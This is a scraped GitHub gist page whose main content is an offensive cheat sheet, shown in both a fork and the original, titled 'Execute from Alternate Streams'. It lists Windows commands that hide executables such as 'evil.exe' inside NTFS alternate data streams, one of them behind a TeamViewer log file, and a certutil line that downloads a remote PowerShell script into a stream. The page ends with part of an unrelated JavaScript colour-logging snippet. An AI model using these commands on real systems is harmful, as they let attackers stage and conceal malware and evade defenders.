Skip to content

Instantly share code, notes, and snippets.

View adamick098's full-sized avatar

adamick098

3 followers · 35 following
View GitHub Profile
@adamick098
adamick098 / Exe_ADS_Methods.txt
Created August 11, 2021 09:44 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
###Add content to ADS###
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active April 16, 2024 13:25
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@davidgilbertson
davidgilbertson / color-log.js
Created January 6, 2018 05:28
function logColor(color, args) {
console.log(`%c ${args.join(' ')}`, `color: ${color}`);
}
const log = {
aliceblue: (...args) => { logColor('aliceblue', args)},
antiquewhite: (...args) => { logColor('antiquewhite', args)},
aqua: (...args) => { logColor('aqua', args)},
aquamarine: (...args) => { logColor('aquamarine', args)},
azure: (...args) => { logColor('azure', args)},